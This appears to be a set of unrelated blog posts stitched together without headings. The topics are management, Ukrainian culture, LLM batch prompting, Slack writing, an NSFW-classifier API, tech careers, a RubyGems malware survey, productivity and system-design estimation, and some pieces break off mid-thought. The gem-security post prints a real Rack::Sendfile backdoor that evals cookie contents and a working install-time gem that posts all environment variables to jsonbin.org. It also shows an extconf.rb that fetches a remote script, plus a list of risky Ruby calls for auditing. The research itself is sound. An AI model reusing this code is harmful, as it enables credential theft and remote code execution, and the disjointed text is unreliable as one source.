Two key takeaways continue to resonate with me a week later: the importance of cultivating curiosity and allowing space for growth. These concepts have significantly influenced my approach to providing feedback, adding a fresh perspective to my managerial toolkit. Stay tuned as I delve into these transformative ideas in my latest blog article!
Historically, my 1:1 conversations went like this:
me: Hi, I noticed there was an issue in ___. Can you tell me more about that?
them: Don't worry, I fixed it.
me: Thanks for fixing it. But how can we prevent this from happening again?
them: I will do better next time.
me: That's not the answer I was looking for. Can you be more specific?
them: I will be more careful.
me: …
me: Let me just give you the answer. What if we try doing A, B, and C?
In retrospect, I acknowledge the limitations of my approach as I lacked sufficient information to confidently recommend A, B, and C. I now recognize the importance of cultivating curiosity about the problem at hand before imposing my own biases and assumptions. Moving forward, I aim to adopt a more inquisitive mindset to better understand and address challenges.
In problem-solving, guiding individuals with strategic questions proves more effective than managers simply offering personal advice. By delving into the root cause through thoughtful inquiry, people can tap into their creativity to discover solutions on their own. This approach fosters self-discovery and empowers individuals to navigate challenges autonomously.
A few times per week, we have deep discussions about Eastern European culture, the Russian-Ukrainian war, and adjusting to American culture.
A popular holiday dish in Ukraine is “Помидоры С Майонезом и Сыром” or Snowy Tomato Slices. With smiling faces, they presented to me a tray of shredded cheese, tomatoes, and 2 tablespoons of white mayo.
Unfortunately, I didn’t take a photo, but they looked like this:
The flavor was exactly what you’d expect: cheese, mayonnaise, and tomato. They told me the history of this dish, rooted in the shortages of the USSR, when only limited ingredients were available. This reminded me of the “Depression Meals” my grandparents told me about from when they were growing up. My grandma would be sent to the store to make purchases alone because she was a “cute little girl,” and the shopkeepers wouldn’t say no to her, allowing her to borrow until the debt could be paid.
In U4U Facebook groups, people brutally attack young men seeking parole because they want them to stay to fight or participate in the local economy.
They told me that when the war first broke out, many Ukrainians felt sorry for the people that ran. They abandoned their friends, family, jobs, and personal possessions to pack up their bags and hike across the border to escape a war that would only last a few weeks.
Now, the Ukrainians that have stayed are upset that the expat Ukrainians have such happy and prosperous lives. The expats are earning more money, traveling, and living in safety. Back in Ukraine, life is dangerous and even basic items are harder to obtain.
These feelings of jealousy and unfairness are visible in the Facebook groups that support refugees and political bills. On Facebook, keyboard jockeys attack anyone trying to leave Ukraine or migrate to the USA. They check whether an applicant has already left Ukraine and claim that “there’s no need to sponsor this person because they are already in the EU.” They post news articles saying that if young men leave Ukraine, they will be arrested when they return, or that Ukraine will cut off consulate and banking services to those that leave.
But I know the Ukrainian government is smarter than this. I think their current goal is to discourage people from leaving so they can operate their economy and fight their war, but once the war ends, they will be desperate to attract the talent (and money) that left Ukraine back. I suspect the government will flip and offer tax incentives to bring in the wealth that is currently generated by their expats.
America is a melting pot of tea cultures, but I learned that Ukraine, like India, is highly opinionated about teas but in unexpected ways.
When I visited the Grab office in Bangalore, India in October 2023, my team took me around to a few chai shops where they give you a shot glass of the most amazing boiling hot sweet milk tea I have ever had. I often ordered 2-3 different flavors so I could experience them all. During one of these lunches, my team member in a deadpan tone shared, “Kevin, you cannot have tea without milk. If there is no milk, then that is not tea.” I had a good chuckle and made a mental note to bring high-quality green tea on my next trip.
But in Ukraine, I heard the exact opposite: “How can you ruin tea by adding milk?”.
If you have any comments, send me an email at kevin@sparkstart.io
In a professional environment, we expect coworkers and customers to behave professionally using professional language.
But across cultures, words and phrases can have different meanings. A classic example is an interview with a British television host discussing a job opportunity in the USA.
Last year, I encountered this situation several times in real-life scenarios where a driver and passenger struggled to communicate during a pickup.
A passenger (who presumably learned English as their 2nd or 3rd language) would message the driver, intending to ask for a message when the driver arrives at the pickup location:
passenger: massage me when you get here
To a native English speaker, this is unprofessional sexual harassment. Passengers should not request personal favors from their rideshare drivers.
But maybe, this was just an unintentional misspelling.
But what if the passenger sends:
passenger: when you cum, massage me
Is this intentional sexual harassment, or is this person uncomfortably bad at English? Given that this was sent in a country with many non-native English speakers, the author is likely someone who learned English by listening and learned spelling by sounding out words. But if this were sent in a native English-speaking country, it would be considered sexual harassment.
Content moderation is hard.
In English-speaking countries like the USA, Canada, or England, these messages would likely be deemed offensive.
In a language-diverse country like Singapore or Thailand, messages like this are just part of everyday business.
Even English teachers can teach the wrong pronunciation of words, as seen in this classic
If you have any comments, send me an email kevin@sparkstart.io
Pealing back the onion, LLMs speak in tokens. Computers understand numbers and are really good at performing calculations with them, but too many numbers (and too many calculations) leads to slow performance.
Enter tokens. Tokens are seemingly random chunks of letters (sometimes English words, sometimes not), each represented by a number. This compression from individual letters to chunks of letters reduces the number of calculations a computer needs to run an LLM, since one token may represent an entire word. OpenAI has a tokenizer playground for exploring how characters map to tokens.
Notice how ' back' or ' onion' are full tokens, but 'Pealing' comprises 2 tokens ('P' and 'ealing'). An overly simple explanation is that OpenAI defined these tokens based on the most common character sequences in their dataset: common words are given their own token, and less common words are composed of smaller tokens.
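To make the mapping concrete, here is a toy greedy longest-match tokenizer. The vocabulary and token IDs below are invented for illustration; real tokenizers like OpenAI's use byte-pair encodings learned from a corpus, not a hand-written table.

```python
# Toy vocabulary: made-up IDs, chosen to mirror the 'Pealing' example above.
VOCAB = {"P": 47, "ealing": 13155, " back": 736, " the": 279, " onion": 38427}

def tokenize(text):
    tokens = []
    i = 0
    while i < len(text):
        # Take the longest vocabulary entry that matches at position i.
        match = max(
            (t for t in VOCAB if text.startswith(t, i)),
            key=len,
            default=None,
        )
        if match is None:
            raise ValueError(f"no token matches at position {i}")
        tokens.append(VOCAB[match])
        i += len(match)
    return tokens

# 'Pealing' splits into 'P' + 'ealing'; the common words get whole tokens.
print(tokenize("Pealing back the onion"))
```

Common words end up as single IDs, while the uncommon 'Pealing' costs two.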
Prompts with large samples create many tokens, and more tokens mean higher costs. If you structure your prompt correctly, an LLM can respond to a batch of requests in a single prompt, so the same samples are shared across all of them.
The Experience + Slogan examples consist of 62 tokens. The actual prompt itself is 17 tokens, roughly a quarter of the total prompt token count. If you have multiple prompts that share the same examples, you can answer them all with a single prompt. This may sound confusing, so let me break it down.
With batch prompting, the model responds to multiple requests within a single prompt, minimizing the number of tokens that need to be sent. The shared samples are defined once, separately from the per-request results.
Pretend you are a food reviewer that only writes positive slogans about a restaurant.
Experience[1]: The pizza was too soggy
Experience[2]: The owner gave my son a toy with his hamburger
Slogan[1]: Pizza is popular
Slogan[2]: Best family friendly hamburger joint
Experience[3]: The spaghetti sauce paired perfectly with the home made pasta
Experience[4]: The sushi rolls are creative, the artistry is wonderful and everything was absolutely delicious!
Experience[5]: I like how they have both an extensive burger and breakfast menu - hence the Bs! They kept my coffee going and even catered to a number of adjustments for my friends - now that's service!
(153 tokens)
Slogan[3]: Perfectly paired pasta, sauce and all!
Slogan[4]: Creative sushi, artistry on point, flavors divine!
Slogan[5]: Bs for breakfast, burgers, and beyond! Exceptional service and customization.
GPT perfectly associated each experience number with its slogan (without leaking any information across experiences). The batch prompt used 153 tokens, whereas the single prompts used 66, 73, and 97 tokens respectively (totaling 236 tokens).
With batch prompting in this example, the token count drops from 236 to 153, about a 35% reduction in tokens and cost, while achieving similar accuracy.
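A sketch of how the batching could be wired up in Python. The prompt builder shares one copy of the examples across all requests, and a small parser splits the numbered slogans back out of the reply; the function names and line formats are my own, not from any particular LLM SDK.

```python
import re

def build_batch_prompt(instruction, examples, experiences):
    # examples: (experience, slogan) pairs shared by every request.
    # experiences: the new inputs to answer in one batched prompt.
    lines = [instruction]
    for i, (exp, _) in enumerate(examples, start=1):
        lines.append(f"Experience[{i}]: {exp}")
    for i, (_, slogan) in enumerate(examples, start=1):
        lines.append(f"Slogan[{i}]: {slogan}")
    for i, exp in enumerate(experiences, start=len(examples) + 1):
        lines.append(f"Experience[{i}]: {exp}")
    return "\n".join(lines)

def parse_batch_response(text):
    # Pull "Slogan[i]: ..." lines out of the model's reply, keyed by index.
    return {int(m.group(1)): m.group(2).strip()
            for m in re.finditer(r"Slogan\[(\d+)\]:\s*(.+)", text)}
```

Because the examples appear only once no matter how many experiences you append, the per-request token cost shrinks as the batch grows.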
This technique can reduce LLM costs by 50%+ with minimal accuracy degradation, making it perfect for processing millions of prompts for summarization or entity extraction at low cost.
A word of warning: this technique isn’t free. There is a ~3% decline in accuracy comparing a batch size of 4 to a single prompt, with an even sharper drop in accuracy from a batch size of 4 to a batch size of 6.
As many know or suspect, communication with a 12-hour delay is not efficient. Miscommunications or lack of communication adds at least a 1-day delay (more for weekends and holidays), therefore thoughtful and intentional communication is critical for career success.
In the early days of my career, people wouldn’t answer my questions, didn’t trust what I was sharing, or took forever to respond. From these experiences, I developed the following writing style for Slack to mitigate communication gaps and speed up my project deliveries.
I want to share 5 Slack writing techniques that I have learned while communicating with peers across a 12+ hour timezone gap, and at the very end, I share the writing template I use to structure most of my async communication (email or Slack).
Follow-up questions instantly delay projects by at least a day. Know your audience and provide the context they need to answer your questions.
Avoid acronyms, because you never know if they know them.
Define proper nouns that they might not be familiar with. For example, “The Obi-Wan service has high latency” is bad, because they might not know what Obi-Wan is.
When your peer wakes up at 6am, they do not want to see an essay-length Slack message. The message will be marked as “read” with the intention of responding later, then quickly forgotten.
Remove filler words or phrases. (For example, “By the way…”, “I was wondering about…”)
Speak with confidence. “I think that I can possibly consider agreeing” 👉 🗑️. Don’t share weak decisions or opinions. Either agree or disagree.
Avoid phrases like “I think…” because everything you write is what you think; no need to say it twice.
Offer a summary. If the message must be long, include a summary to help the reader prioritize when they need to respond.
Do your homework. If you’re not confident about an assumption, do your own research before stating facts or asking for help. If the reader finds a hole in your premise, you lose a day regrouping.
Cite your sources. If you weren’t confident about a key fact, perhaps your reader isn’t either. Link to the documentation relevant to your Slack message. This serves two purposes: the reader can dive deeper if they want, and you can find your sources later if you need to dive deeper yourself.
Provide explicit, clear answers to questions. If someone asks you a yes-or-no question, respond with yes or no. Don’t make the reader guess.
Clearly state what you need from them. Often my peers will bury questions in context or not be explicit about their needs. I’ve seen people (intentionally or unintentionally) avoid answering critical questions because they “missed” them.
Provide the reader enough context to meet your goals.
Public topics should be in public channels and private topics should be in private DMs. Almost every private conversation about a project needs input from other people. Having these conversations in open channels will help future people joining the project have access to earlier discussions. Open channels are also searchable.
I always move project conversations from private DMs to public channels, because most of the time, other people will need to be involved.
greeting: Hi team,
TLDR: If my message gets long, I will include a 1-line Too Long; Didn’t Read to help the reader decide if they actually want to read my message now if it can wait until later.
Context and the problem: Here I provide context to the problem, assuming they have no idea what I am talking about. I do not want them to ask follow-up questions, because those add delays. I do not use acronyms.
end: A clear, ordered list of questions, sorted to match the context.
- Question 1
- Question 2
Example
Hi team,
The latency graph (dashboard link) for our messaging service (code link) from your service (client code link) increased > 15% week over week. We have not made any deployments in 2 weeks (deployment log link) or configuration changes (configuration dashboard link).
- Has anything changed with the amount of traffic or size of the payload from your system?
- Is there someone that can help me investigate this?
In this example, I assume whoever is on-call knows (almost) nothing about their team’s integration with my team’s servers.
If you have more tips you want to share, send me an email kevin@sparkstart.io
I built a low-cost NSFW API hosted on Digital Ocean’s new App Platform.
I added Bumble’s Private Detector to the model host so both models can be leveraged. Both models can be hosted on FlyIO’s low-cost servers for about $25/mo.
Making predictions from images involves two basic steps: training the model and then serving predictions. How to train the ML model is covered in the GitHub repo: GantMan/nsfw_model.
The prediction API first fetches the remote image and saves the bytes to disk. Persisting to disk simplifies communicating with the ML library since the library accepts a file path, not a byte stream.
Then the image is resized to fit the dimensions of the ML model. The ML algorithm needs to compare apples to apples and so resizing to match the same size of the image training data is critical for developing the right comparison.
The resized image is categorized using the attached model. This provides a float score for each of the categories: drawings, hentai, neutral, porn, and sexy. The higher the score, the more likely the image is in this category.
Once the prediction is created, we clean up after ourselves by deleting the image from the disk and return the response.
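The fetch, persist, classify, clean-up flow described above might look like this sketch. The `classify` callable stands in for the real model invocation; the names here are illustrative, not the service's actual code.

```python
import os
import tempfile
import urllib.request

CATEGORIES = ["drawings", "hentai", "neutral", "porn", "sexy"]

def predict_url(url, classify):
    # 1. Fetch the remote image and persist the bytes to disk: the ML
    #    library wants a file path, not a byte stream.
    fd, path = tempfile.mkstemp(suffix=".jpg")
    try:
        with urllib.request.urlopen(url) as resp, os.fdopen(fd, "wb") as out:
            out.write(resp.read())
        # 2./3. `classify` resizes the image to the model's input
        #       dimensions and returns one float score per category.
        scores = classify(path)
        return dict(zip(CATEGORIES, scores))
    finally:
        # 4. Clean up after ourselves: delete the temp image from disk.
        if os.path.exists(path):
            os.remove(path)
```

Injecting `classify` keeps the I/O plumbing testable separately from the model itself.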
On the client, these scores are converted to 3 states:
The unknown state will need to be human-reviewed and bucketed into one of the “definite” categories. For my first pass, I use a combination of “sexy” and “porn” scores to determine if it’s “definitely adult content” and I look at the “neutral” score to know if the image is “Definitely safe Content.”
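As a sketch, with made-up cutoff values (my real thresholds aren't spelled out in this post, so tune these against your own review data):

```python
def bucket(scores, adult_cutoff=0.7, safe_cutoff=0.8):
    # Cutoffs are illustrative; calibrate them with human-reviewed samples.
    if scores["porn"] + scores["sexy"] >= adult_cutoff:
        return "definitely adult"
    if scores["neutral"] >= safe_cutoff:
        return "definitely safe"
    return "unknown"  # route to human review
```

Scores dominated by "neutral" land in "definitely safe"; everything ambiguous falls into the human-review queue.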
Self-hosting and using this only takes a couple of hours since the API is so simple and Digital Ocean’s App Platform allows for Heroku-like deployment.
You will need to develop your client, but there are only 2 HTTP endpoints you would need to implement: POST /predict and GET /health.
The service accepts a URL of an image to fetch and process. Instead of passing the image bytes directly, the URL reduces the workload on the client and avoids the overhead of base64 encoding images for the transfer (base64 has a ~33% worse space overhead).
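The ~33% figure comes from base64 packing every 3 raw bytes into 4 ASCII characters, which is easy to verify:

```python
import base64

raw = bytes(range(256)) * 30  # 7,680 bytes standing in for image data
encoded = base64.b64encode(raw)
print(len(raw), len(encoded))       # 4 output characters per 3 input bytes
print(len(encoded) / len(raw) - 1)  # ~0.33, i.e. ~33% overhead
```

Passing a URL instead keeps that inflation off the wire entirely.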
$ curl -XPOST 'http://localhost:8080/predict?url=https://www.kcoleman.me/images/hills.jpg'
{"drawings":0.11510543525218964,"hentai":0.024719053879380226,"neutral":0.803202748298645,"porn":0.0172234196215868,"sexy":0.039749305695295334}
The health endpoint helps you monitor if the service is running without needing to process an image.
$ curl 'http://localhost:8080/health'
{"status":"ok"}
Unfortunately, Heroku limits the slug size to 500MB. After compilation, the flask app is 635MB, due to needing to load the ML model (250MB) and PyTorch. This makes it impossible to host this ML service on Heroku.
The $10/mo Digital Ocean 1GB/1vCPU App Platform hosts this project perfectly. The first deployment takes 20+ minutes, but it will eventually start up. There is a health check endpoint at /health where you can verify the service is running.
This machine takes about 600ms per request and has 2 workers, so it can handle about 0.8 requests per second, or 72,000 images per day. Not too shabby for a $10/mo ML microservice.
Sample App config
name: nsfw-flask
region: nyc
services:
- environment_slug: python
  github:
    branch: master
    deploy_on_push: true
    repo: KevinColemanInc/NSFW-FLASK
  health_check:
    http_path: /health
    http_port: 8080
  instance_count: 1
  instance_size_slug: basic-s
  name: nsfw-flask
  routes:
  - path: /
  run_command: gunicorn --worker-tmp-dir /dev/shm app:app
  source_dir: /
The flask service is a wrapper around GantMan/nsfw_model, which performed the heavy lifting of developing the ML model and the prediction code.
You can play with a web-hosted version of the model on nsfwjs.com since we use the same model.
Tech is eating the world. Tech companies will be the dominant hiring force for at least the next 50 years and they require a variety of programming and non-programming skills to keep their well-oiled machine running.
Whether you just finished a boot camp and are looking for a new job, or you know nothing about tech but want to break in, this overview of common roles can help.
Please note that the compensation numbers are estimates. There are very wide varieties of pay between these roles depending on your geographic location.
Quality Assurance (QA) testers test pre-release apps. QAs try their very hardest to find weird edge cases that will break the app before the users find them. An example bug a QA might find: putting words instead of a number in a text box. The engineer authoring the application may forget to validate the user-submitted text, so if a user inputs text instead of a number, the website may crash. The QA would flag the error and ask the engineer to display a human-friendly message asking the user to enter a number instead of text.
A typical day as a QA: you get instructions to test a feature, try various inputs to break the app, and work with the engineers to correct any problems that arise. You are expected to write reports or short JIRA or Zendesk tickets describing how to reproduce each issue.
It is very common for junior software engineers to start their careers as QAs because QAs have enough understanding of how computers work to find problems. This is a great job to get your foot in the door at a company before transferring into a more traditional software engineering role.
Data Analysts (DA) help product managers, engineers, and business people answer questions about the company’s data. For example, a product manager might want to know “how many users logged into the website this week?”. Data Analysts will use SQL to query various data stores to collect this information. They may even leverage Machine Learning to find the answers to their questions.
These roles are great because unlike engineering roles, there are no on-call duties. If the website is failing, they can continue to sleep through the night :), but the next day DAs will need to report how many people were impacted by the failure.
Candidates must demonstrate writing SQL, with an understanding of JOIN and WHERE clauses. If you’re interested in learning SQL, I love the free Khan Academy class that guides you through the basics. For interviews, be prepared to answer questions about joining tables and basic statistics (e.g. how do you calculate the median?).
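If "median" is rusty: sort the values and take the middle one, averaging the two middle values when the count is even. A quick sketch:

```python
def median(values):
    s = sorted(values)
    n = len(s)
    mid = n // 2
    # Odd count: the middle element; even count: average the two middle ones.
    return s[mid] if n % 2 else (s[mid - 1] + s[mid]) / 2
```

Interviewers like this question because the even-count case is easy to forget.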
Product managers (PMs) listen. PMs gather information from data analysts, users, engineers, sales, and business verticals to identify and prioritize the problems that engineers will solve. For example, a user may ask for the website to let them import their data via a CSV file. The product manager will talk with the engineers to determine how long creating the feature will take, and the PM will talk with other users and stakeholders to determine how important this problem is. Sometimes the engineers may say, “This feature will take 4 months to build,” and the PM may decide it is not worth the effort.
PMs tired of PMing often switch to becoming software engineers, and software engineers often switch to becoming PMs. Technical PMs are great because they understand the limitations of software and can analyze data to find the lowest-hanging fruit.
Product managers’ roles vary from company to company, because much of their work is defined by the company’s work culture. Read through the job description and modify your CV/resume as necessary to put your best foot forward when applying to these roles.
Technical Product Managers are similar to Product Managers, but they work much closer with engineers than sales or other business verticals. A TPM might be asked to analyze a 3rd party for integration, perform competitive analysis, or assist engineers with developing engineering specs that meet the requirements of product managers.
Many software engineers start their careers as TPMs and transition to software engineering for the higher pay and larger direct impact on the users.
As a junior software engineer, your job will primarily be implementing features that senior engineers define. For example, they may ask you to “make a JSON REST API for this MySQL table”.
Junior software engineer roles take the most skill to land. At large companies, junior roles are primarily filled by college students and recent grads with engineering or CS degrees, so it can be challenging to break in. Startups and consulting agencies have the lowest hiring bar because they struggle the most to attract applicants. Startups typically don’t have enough money to compete with the larger companies, so they are great places to launch your software engineering career.
You should also consider joining software engineering consulting firms, especially if you live in Asia or Eastern Europe. These companies are also desperate for talent as projects ramp up and customers need products delivered quickly. Consulting companies struggle to hire for similar reasons as startups, but the work is also less consistent. I helped a friend of mine land his first programming job as a part-time software engineer at a consulting company I worked at. 3 years later, he was working full-time at Facebook, earning more than I do!
Open-source packages are an amazing, but also scary, gift. When you install and execute foreign code, you’re trusting that the maintainers are good citizens who aggressively audit code changes. On my dev laptop, I have unencrypted bitcoin wallets and API keys hardcoded in environment variables that any program I run would have access to.
Package hosts make it difficult for devs to audit the hosted code because there is no tight coupling between code-viewing platforms like GitHub and the compressed code hosted on the package server. The code shared on GitHub could be completely different from the code hosted on the package server, since the two are not connected. The only true way to audit the library you’re using is to fetch, unpack, and inspect the millions of lines yourself.
Ruby’s monkey patching and bundler tooling leave apps vulnerable to a variety of remote code execution attacks. I downloaded the latest version of every gem hosted on RubyGems.org to find what malware could be lying hidden in the open. I searched 2,500,000 Ruby files with golang, looking for RCE, unexpected network requests, and more.
During the bundle install process, code from the gem is executed if there is an extconf.rb file. By design, extconf.rb contains instructions on how to build C libraries when installing the gem, since some gems are written in a lower-level language to take advantage of the better performance. An example is fast_blank, which drops into C-land to quickly determine if a string value is blank.
Monkey patching first-class types like String or Object can both improve the usability of these objects and expose vulnerabilities. In 2019, someone monkey patched Rack::Sendfile to add their middleware to Rails apps that installed a bad version of bootstrap-sass.
begin
  require 'rack/sendfile'
  if Rails.env.production?
    Rack::Sendfile.tap do |r|
      r.send :alias_method, :c, :call
      r.send(:define_method, :call) do |e|
        begin
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          eval(x) if x
        rescue Exception
        end
        c(e)
      end
    end
  end
rescue Exception
  nil
end
This code would allow the attacker to run arbitrary code passed in via the cookie. The code could share the machine’s configuration variables and database connections.
The eval method executes a string as if it were Ruby code (details). Most gems or Rails applications should never use this method because it is too easy to abuse. Allowing a user-submitted string to be evaluated would let any user run code on your production machine and thus grant full access to your internal network. Scary stuff.
The send method acts similarly to eval, but it is invoked on an object. For example, "kitten".send("capitalize") returns “Kitten”. If a user-defined variable is given instead of a hardcoded string, arbitrary methods could be invoked. Most gems should never use the send or eval methods.
Hackers can also open network requests to a server, sending private information about the machine installing or running the gem. In Ruby, you should verify that the Net class is not being unexpectedly used to call a command and control center.
Most gems also should not be accessing the ENV object. Developers often store their private keys as environment variables instead of hardcoding them in code.
List of objects and methods to check:
ENV
eval
send
exec
` (backticks)
fork
spawn
syscall
system
Rubygems.org offers a data dump of all of the gems on RubyGems along with their download counts. For the sake of speed and bandwidth limitations, I only fetched the top 100,000 for analysis.
I was a bit lazy and used a Gemfile and bundle install -j 8 to fetch the latest version of the 100,000 most popular Ruby gems as of 2020-11-15.
With the raw source code dumped into a local directory, I can use a mix of Ruby and grep to search all of the gems for suspicious code. Unfortunately, I wasn’t able to fully automate the research process. My script searched for suspicious method calls and flagged the line along with the package name, and then I verified whether each suspicious line was a false positive. For example, a Ruby gem that adds a CSS framework should never use eval, but it may use it in its test cases. In general, it’s never good to use eval, but using it in a test case that isn’t run on production should be safe.
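The actual scanner is written in golang, but the flag-then-manually-review step fits in a few lines. This Python sketch is my own simplification, not the project's code, and the pattern list mirrors the methods called out above.

```python
import re
from pathlib import Path

# Method calls and objects that warrant a manual look (see the list above).
SUSPICIOUS = re.compile(r"\b(eval|send|exec|fork|spawn|syscall|system)\b|`|\bENV\b")

def scan_gems(root):
    # Flag every line in every .rb file that touches a suspicious call.
    # Each hit still needs a human to rule out false positives (e.g. tests).
    hits = []
    for path in Path(root).rglob("*.rb"):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if SUSPICIOUS.search(line):
                hits.append((str(path), lineno, line.strip()))
    return hits
```

A word-boundary regex keeps `send` from matching inside identifiers like `sendmail`, though string contents still produce false positives to weed out by hand.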
The git repo powering this exploration can be found at https://github.com/KevinColemanInc/gem-sec-research.
Highlights! Using sensitive Ruby code isn’t inherently bad, so I’m not able to understand the intention of 200,000 Ruby gems to determine whether calling eval is malicious or expected. The much lower-hanging fruit is gems that attack the server or the developer’s box via extconf.rb. My gemsploit gem sends all of the ENV variables up to a server.
lwes_ext, downloaded 69,122 times, downloads a script from a website and executes it when installed. The script is no longer available, so it just crashes. Since the project and website aren’t maintained, I worry that a malicious actor could buy the domain if it were allowed to expire and swap in a more nefarious script.
# uwsgi-2.0.19/ext/uwsgi/extconf.rb
require 'net/http'
Net::HTTP.start("uwsgi.it") do |http|
  resp = http.get("/install")
  open("install.sh", "wb") do |file|
    file.write(resp.body)
  end
end
uwsgi is doing the same as lwes_ext, executing arbitrary code downloaded from the internet. The script behind this 404s now, so who knows what it was doing before?
This failure is intentional. You probably meant to install and run http-cookie
In httpcookie, a kind-hearted developer trying to prevent people from falling prey to typosquatting created a gem called httpcookie that does nothing but fail on install. It warns developers that they mistyped the gem name and need to install the correct gem instead.
I wrote the gemsploit gem to explore what can happen with malicious code.
require 'json'
require 'net/http'
require 'securerandom'
uri = URI.parse("https://jsonbin.org/kevincolemaninc/#{SecureRandom.uuid}")
request = Net::HTTP::Post.new(uri)
request["Authorization"] = "token " # withheld
request.body = JSON.dump(ENV.to_h)
Net::HTTP.start(uri.hostname, uri.port, use_ssl: true) { |http| http.request(request) }
By installing this gem, all of your ENV variables are posted up to jsonbin.org for public viewing. My development machine had AWS secrets, bitcoin wallet secrets, and other hard-coded passwords. I have since moved to use dotenv to silo my env secret keys, but this still doesn’t protect gems from scanning your hard drive for unprotected BTC wallets.
[EN] How to take over a Ruby gem / Maciej Mensfeld @maciejmensfeld
This conference talk was the inspiration for this exploration.
This is a really neat project that makes it easy to compare changes across versions of gems. You still have to take the time to audit the changes, but hopefully, with their clean interface, it does not take you too long.
You can find the source code for lib-scanner on github. The project is (mostly) written in golang with an in-depth readme file explaining how the code pipeline works.
I’d love to bring this scanner to other languages like golang or python. Please shoot me an email (kevin at sparkstart.io) if you’re interested in collaborating!
I started applying engineering and psychological techniques to maximize my performance in life in 2018 because, as the end of the year approached, I hadn’t yet accomplished my goals for the year. I lacked focus and accountability. In 5 months, I was able to perform 18 pullups (starting at 6 pullups), reduce alcohol consumption to 2x per month, and bench-press 180 lbs (starting at 135 lbs). #PatsSelfOnBack.
My biggest obstacle was cutting out the wasted time in my life. I’d spend hours browsing Reddit because I was confused as to what I should do to achieve my goal. When I had a lazy Sunday afternoon, instead of taking action, I’d hop on the dopamine treadmill of Netflix. There was too much friction between determining what I should be doing and doing it.
Enter Todoist. Todoist allows me to manage what I need to get done today. I put my entire life in there. My list was:
Todoist had fresh content for me every day because I mixed habit actions (e.g. brush teeth) with irregular actions (book flights for an upcoming trip), unlike habit-tracking apps that show the same boring content every day.
Mario Tomic of Fitness Mastery recommends using a calendar to keep focused. This is a great alternative for people who want even more structure: you can assign tasks to specific time slots. Personally, my life is organic, and I don’t always have the same set times available for certain tasks. Any action someone asks me to do goes onto my action list to complete later. I no longer default to Netflix when I am unsure how to spend my mornings or afternoons.
Todoist is for managing actions, not goals. Actions are short (preferably done in 45 minutes or less) and have a clear metric for success. If an action will take longer than 45 minutes to complete, consider breaking it up into smaller actions. Large actions require large blocks of time, and large blocks of time are so, so rare. The large action of “clean house” can be broken down into smaller actions like “clean bedroom”, “clean kitchen”, “do the dishes”, and “vacuum bedroom” that are much more digestible and easier to accomplish.
Goals are accomplishments that have a clear metric for success but are too big to be considered an action. Example goals might be “bench-press 180 lbs” or “write 1,000,000 lines of code this year”. Goals do not belong on your daily Todoist list; capture them as non-time-defined projects (i.e., don’t set a deadline). If goals are added to your daily list, they will sit there, incomplete, for months and months without actually providing much value. Your goal might be to bench-press 180 lbs; the better daily action is to work out.
After you enter all of your daily and irregular action items into Todoist, you need to build the habit of checking the app and completing the actions you need to do each day. This is much easier than with a typical habit-tracking app because the content in your list is dynamic and irregular. Yes, you will need to check off “brush teeth” every day, but other actions like “email boss the TPS reports” will keep you from getting bored.
Like Pavlov’s dogs, humans develop a habit when they are rewarded for completing an action. Developing a healthy reward system for using Todoist and completing actions will trigger a dopamine kick that brings you back to the app to do more actions. These rewards must happen immediately after the action is completed, and they must be healthy (don’t go eat candy after a hard workout at the gym).
The best reward you can give yourself is appreciating that you accomplished the action. Maybe the action was to file your taxes. Super boring action. How can that be rewarding? Learn to love the experience of checking things off your list. Each time I accomplish an action, I know I am one step closer to ending my day with an empty list. It feels good to know I am progressing in life.
The reward should be that you completed the action, not that the action was “successful”. Take dieting, for example: you might have a daily action of “eat an apple” to make you feel fuller and help you lose weight. Be happy when you stay on track and eat that apple every day, not only when your weight decreases.
If you can’t complete your list, that doesn’t mean you should do nothing. Many people get stuck in the mindset of “If I don’t have time to complete an action, I won’t do it at all.” Sometimes doing 50% is better than 0%.
Let’s say your goal is to be a successful blogger. Your weekly action is to write a blog article once per week. By the end of the week, you’re tired and you don’t have time to write a complete article. Instead of writing what you can, you do nothing and tell yourself, “better luck next week.”
A much better mindset is to be okay with partial credit. Write what you can and finish it next week. Someone who writes every week, even if it is just a few sentences, will be more successful than someone who writes 3-4 articles and then stops.
After you develop the habit of checking Todoist and using it regularly, you will start to see certain actions stuck in your overdue queue or continuously rescheduled. This situation requires introspection.
Your body and mind don’t understand “weekends”; they only know days. Take breaks, but try to maintain your foundational habits no matter what you are doing in life. Even on vacation, I will exercise every day or review study materials for classwork.
If this vibes with you, let me know.
System design interviews are a dynamic process that is more art than science. Your interviewer will be looking for specific answers, so spending too much time in one particular area might mean the interviewer won’t be able to learn what they need to. Pace yourself and ask clarifying questions like, “Do you want me to dive into this more, or should we move on to the next step?”
Many system design questions want you to tell a story, much like other parts of the interview. System design is about breaking the problem into micro-problems and knocking them out one by one.
Clarify ambiguities and determine system end-goals to assess the exact scope of the problem or task at hand.
Clarify how data will flow between different system components to enable better data partitioning and management.
Imagine it’s you and your dog building this solution on the weekend. Every website (Dropbox, Facebook, Salesforce) started small and grew as bottlenecks were identified and resolved. Design a system that meets all of the requirements in its simplest form, even if your system runs on one machine. If you’re interviewing at Amazon, this will demonstrate [Insert LP].
What are you
Estimate how much traffic you need to support and how many machines you will need to handle that traffic.
Memorize these estimations:
100 million requests per month ≈ 40 queries per second (QPS). Number of cores = QPS × request time (e.g., 100 ms).
For example, let’s estimate the number of machines we need to support 1 million users making 20 requests per day.
1 million users × 20 requests per day × 31 days ≈ 620 million requests per month. 620 million ≈ 6.2 × 100 million, so ≈ 6.2 × 40 QPS ≈ 240 QPS (just memorize that 100 million requests per month ≈ 40 QPS). 240 QPS × 0.1 s per request = 24 cores.
You will need at least 24 cores to fully process the requests, plus additional cores for headroom in case of failure.
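The back-of-the-envelope math above can be scripted as a sanity check. This is a rough sketch under the article’s assumptions (20 requests per user per day, 100 ms per request, traffic spread evenly across the day); the function name and structure are mine, not a standard API.

```python
import math

SECONDS_PER_DAY = 24 * 60 * 60  # 86,400

def estimate_capacity(users, requests_per_day, request_time_s=0.1):
    """Rough QPS and core count for a given load, assuming traffic
    is spread evenly across the day (real traffic has peaks)."""
    qps = users * requests_per_day / SECONDS_PER_DAY
    cores = math.ceil(qps * request_time_s)
    return qps, cores

# 1 million users making 20 requests per day at 100 ms per request:
qps, cores = estimate_capacity(1_000_000, 20)
print(f"~{qps:.0f} QPS, {cores} cores")  # ~231 QPS, 24 cores
```

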